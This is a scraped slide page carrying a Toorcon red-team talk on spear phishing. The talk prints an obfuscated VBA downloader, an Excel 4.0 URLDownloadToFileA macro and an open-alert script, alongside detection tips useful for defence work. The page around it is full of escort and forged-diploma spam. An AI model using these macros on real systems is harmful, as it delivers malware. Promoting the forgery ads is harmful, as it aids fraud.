VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Deliverybabeytanya
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Roomgirls4nights
 
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一3sw2qly1
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...aditipandeya
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一Fs
 

Recently uploaded (20)

Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
 
Complet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled PersonComplet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled Person
 
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
 
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Samaira 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
sasti delhi Call Girls in munirka 🔝 9953056974 🔝 escort Service-
sasti delhi Call Girls in munirka 🔝 9953056974 🔝 escort Service-sasti delhi Call Girls in munirka 🔝 9953056974 🔝 escort Service-
sasti delhi Call Girls in munirka 🔝 9953056974 🔝 escort Service-
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
 
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
 
Call Girls Service Dwarka @9999965857 Delhi 🫦 No Advance VVIP 🍎 SERVICE
Call Girls Service Dwarka @9999965857 Delhi 🫦 No Advance VVIP 🍎 SERVICECall Girls Service Dwarka @9999965857 Delhi 🫦 No Advance VVIP 🍎 SERVICE
Call Girls Service Dwarka @9999965857 Delhi 🫦 No Advance VVIP 🍎 SERVICE
 

Toorcon - Purple Haze: The Spear Phishing Experience

  • 1. Purple Haze The SpearPhishing Experience feat. Jesse Nebling
  • 2. Warning! Challenger approaching Jesse Nebling (@bashexplode) ● Internal Red Team ● Former Consultant ● Seattle, WA ● Windows exploitation ● “Purple Team” advocate ● Music production ● Stoked to be here A new foe has appeared!
  • 3. During a Red Team operation, treat the attacker as a real Adversary.
  • 4. What’s the point? ● Spear Phishing trial and error by both Adversaries and Blue Teams ● Pinpoint areas that may help tighten security and foster detection ● Give Blue Teams a glimpse of how Adversaries are plotting against them
  • 5. Agenda ● Recon: Network & (Security) Tech Stack ● Adversarial OpSec: ○ Testing dropper malware ○ Image injection and text message notifications ○ One-time use tokens for phishing payloads ● Malicious Attachments: ○ Remote Template injection ○ VBA macros ○ Calendar phishing ○ Excel 4.0
  • 6. Recon: Network & (Security) Tech Stack Typical OSINT Activities: ● whois ● Subdomain lookups ● Job openings for specific technologies ● Current employee job descriptions ● Social Media ● File metadata ● Public code repositories (e.g. github) ● Sites that share tech stacks (e.g. stackshare.io) ● Finding services that expose internal domain names ● Bouncing emails off of domains What the adversaries use this for: ● Create firewall rules to C2 servers ● Discover single factor authentication entry points ● Environmental keying ● Crafting malicious payloads ● Tailoring tradecraft Relevant Threat Actor: All Tool reference: https://github.com/bashexplode/pacifist-toolkit
  • 7. MS Lync/Skype for Business services give base64 encoded internal NetBIOS domain name and FQDN when invalid credentials are entered: Bounced email uncovering internal host and domain name as well as email sandbox service: Recon: Network & (Security) Tech Stack Relevant Threat Actor: All Talk reference: The Weakest Lync (DerbyCon 2016)
  • 8. Recon: Network & (Security) Tech Stack Areas of potential detection: ● Mass downloads of externally hosted files ● Emails being bounced against non-existent email accounts ● Bruteforcing single factor authentication pages Additional time cost to attacker: ● Egress points outside of networks registered under company’s name ● External covered fully by multifactor authentication ● Employees only have general job descriptions ● Job descriptions do not have specific technologies ● Metadata is wiped from all externally hosted files ● Tech stack is not publically shared ● Wildcard emails not allowed/Cannot bounce emails Relevant Threat Actor: All Tool reference: https://github.com/bashexplode/pacifist-toolkit
  • 9. Adversarial OpSec: Testing Dropper Malware Relevant Threat Actor: All Assume Adversary is extremely dedicated. Take all information uncovered from reconnaissance and set up environment that mimics target’s tech stack. ● Discover methods to bypass AV and EDR tools ● Learn what techniques can be used to move laterally and escalate privileges without triggering alerts in the tech stack
  • 10. Adversarial OpSec: Image Injection & Text Messaging To understand if document was opened and alert on potential blue team activity. ● Set up payload to reach out to a benign image hosted on the web server ○ Microsoft Word -> Insert Quick Parts -> Field -> IncludePicture -> Data not stored with document ● Any time the image is requested, send a text message for instant notification the payload has been open ● UNC path injection can also be used to obtain NTLMv2 hash and obtain alert Sample Python text message script: User Agent for Image GET Requests (Win 10): ● MS Word Office 365 Version 16.0.12026 ● MS Word Version 14.0.4760.1000.20344 Relevant Threat Actor: All import smtplib server = smtplib.SMTP( "smtp.gmail.com", 587 ) server.starttls() server.login( '<gmail_address>', '<gmail_password>' ) server.sendmail( '<from>', '<number>@vtext.com', 'PWND' ) Mozilla/4.0 (compatible; ms-office; MSOffice 16) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; ms-office; MSOffice 14) SMS email reference: https://bit.ly/32XiN4l
  • 11. Adversarial OpSec: One-Time Use Tokens Used in combination with network firewall rules to help further tighten access control on malicious payloads. ● Set staging server with a database that tracks token usage ● Set up payload to reach out to a web page with a token ● If first (or second) time the token is used redirect to real payload ● Otherwise, redirect to benign page or benign payload ● Set up htaccess to redirect atypical user agents Relevant Threat Actor: All MITRE ATT&CK ID: T1192 Tool reference: https://github.com/bashexplode/otu-plz
  • 12. Adversarial OpSec Areas of potential detection: ● Office/PDF reader processes with outbound network connectivity (HTTP(S), SMB, DNS) ● Malicious links in emails from non-trusted domains ● Previously mentioned GET requests with Office User Agent strings ● For the extremely curious, mass phishing campaigns with similar links and one-time use tokens can be used to track down an unclicked link to analyze a payload Incident Response and Defense tips: ● Stray from attempting to download payloads for analysis directly from malicious servers, htaccess redirection may be in place ● Assume adversary knows how to get around EDR tools and AV; after tuning these for lesser skilled adversaries focus on other anomalous activity such as low-level users using administrative command line utilities, lateral movement from HR department workstations, etc. ● Disable SMB outbound traffic Relevant Threat Actor: All MITRE ATT&CK ID: T1192
  • 13. Malicious Attachments Overview Many email sandboxing/filtering solutions have cracked down on well-known payloads, and deny being sent to the recipient altogether. Dedicated adversaries will discover ways around these protections... Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0, Tropic Trooper MITRE ATT&CK ID: T1221
  • 14. Malicious Attachments: Remote Template Injection Pre-staging technique to abstain from sending true payload and risk discovery of C2 infrastructure ● Create a document template that has a malicious macro in it ● Set up a burner staging server and host Word document template on a site that looks legitimate ● Create a benign document and edit XML file stored in Word document archive to point at the template file hosted ○ Document.docxword_relssettings.xml.rels ● Allows docx files to run macros and nothing malicious in document sent to user! Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0... MITRE ATT&CK ID: T1221 Remote Template Web Requests (Win 10): ● MS Word Office 2019 Version 16.0.12026 ● MS Word Version 14.0.4760.1000.20344 OPTIONS /payload-dir/ “Microsoft Office Word 2014” OPTIONS /payload-dir/ “Microsoft Office Word 2014” HEAD /payload-dir/Template.dotm "Microsoft Office Word 2014" OPTIONS /payload-dir/ “Microsoft Office Word 2014” GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; ms-office; MSOffice 16)" HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery" OPTIONS /payload-dir/ “Microsoft Office Protocol Discovery” HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery" X2 OPTIONS /payload-dir/Template.dotm "Microsoft-WebDAV-MiniRedir/10.0.17134" x4 PROPFIND /payload-dir/ “Microsoft-WebDAV-MiniRedir/10.0.17134” GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; ms-office; MSOffice 14)" HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery" x2 PROPFIND / “Microsoft-WebDAV-MiniRedir/10.0.17134”
  • 15. Malicious Attachments: VBA Macros Classic Initial Access technique that has gone through many iterations ● WMI execution ● PowerShell download cradles ● Hiding variables in document properties ● Hiding variables in document XML ● Hiding variables in images/alternative text ● Reverse strings and replace characters ● Use words relevant to business as variables ● Stage the payload ● Execute outside of Office ancestry Relevant Threat Actors: APT12, APT19, APT28, FIN4... MITRE ATT&CK IDs: T1193, T1064 References: VBA Stomping - Advanced Malware Techniques (DerbyCon 2018) Sub Auto_Open(): downloadFile : XSL : PrivacyMode : End Sub Function PrivacyMode() ActiveSheet.Shapes(1).Visible = msoFalse End Function Function downloadFile() ' Replacement characters accounting = "#$" ' stage URL https://example.com/payload.jpg finance = "gp#$j.d#$aoly#$ap/m#$oc.e#$lpmax#$e//#$sp#$tth" ' where to save the downloaded file to - C:Users<user>Desktoptext.exe path = Environ("userprofile") & Application.PathSeparator & _ StrReverse(Replace(ex#$e.ts#$etpo#$tks#$eD, accounting, "") ' MSXML2.ServerXMLHTTP object Set Tuesday = CreateObject(StrReverse(Replace(PTTHLMXre#$vreS.2LMXSM, accounting, "") ' Creating and sending GET request for payload Tuesday.Open "GET", finance, False Tuesday.send If Tuesday.Status = 200 Then ' ADODB.Stream object Set January = CreateObject(StrReverse(Replace("ma#$ertS.B#$DODA", accounting, "") January.Open January.Type = 1 January.Write Tuesday.ResponseBody January.Position = 0 January.SaveToFile path January.Close End Function ' Execution via XSL Function XSL() …SNIP… End Sub
  • 16. Sample Excel 4.0 Macro: ● Insert... -> MS Excel 4.0 Macro ● Set Define Name for Cell A1 to “Auto_Open” User Agent for GET Requests (Win 10): ● MS Word Office 2019 Version 16.0.12026 ● ● MS Word Version 14.0.4760.1000.20344 Malicious Attachments: Excel 4.0/VBA Hybrid Relevant Threat Actor: TA505 Use old version of Excel macros to execute code that bypasses current detection tools ● Stan Hegt and team showed how to execute shellcode directly through Windows APIs and Excel 4.0 macro at DerbyCon ● I wanted to get away from two things with this method ○ Spawning as a child process of Excel ○ Giving away C2 infrastructure if doc is discovered ● Came up with my own attack flow with an Excel 4.0 downloader and VBA execution References: The MS Office Magic Show (DerbyCon 2018) =REGISTER("Urlmon","URLDownloadToFileA","JJCCJJ","URLD",,1,9) =URLD(,"https://example.com/logo.jpg","C:tempartifact.exe",0,) =WAIT(NOW() + "00:00:05") ‘VBA Execution Function =Taxes() =HALT() Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; wbx 1.0.0; Zoom 3.6.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
  • 17. Malicious Attachments Points of discovery: ● Documents with outbound network connectivity ● VBA Scripts run from documents ● Execution as child process of Office product ● Old format versions of Office documents (<Office 2003) ● Calls to misused objects and functions in Office VBA macros: Incident Response tip: ● Sandbox payloads on a system representative of your domain without outbound connectivity (Environmental keying bypasses this) ● oledump.py to scrape VBA and Excel 4.0 (plugin_biff.py) macro content and view code Relevant Threat Actor: TA505 Tool reference: https://github.com/DidierStevens/DidierStevensSuite ○ C08AFD90-F2A1-11D1-8455-00A0C91F3880 ○ Microsoft.XMLDOM ○ Schedule.Service ○ ADODB.Stream ○ MSXML2.ServerXMLHTTP ○ ActiveSheet.Shapes(#).Visible = msoFalse ○ StrReverse ○ Replace
  • 18. Malicious Attachments: Calendar Phishing Make a meeting invite notification pop up posing as important meeting with link of presentation material or conference software to view meeting ● Create a calendar event and include victim as attendee ● Attach a malicious link or document to invite ● Opt out of sending an invite email ● Shells? Points of discovery: ● Meetings originating from non-trusted domain email addresses ● Meetings that appear without an emailed meeting invite Incident Response tip: ● Get business to disable automatic adding of invitations to calendar Relevant Threat Actor: Scammers, me, Future Threat Actors probably
  • 19. Thank you for playing! Thanks your time and attention. Questions?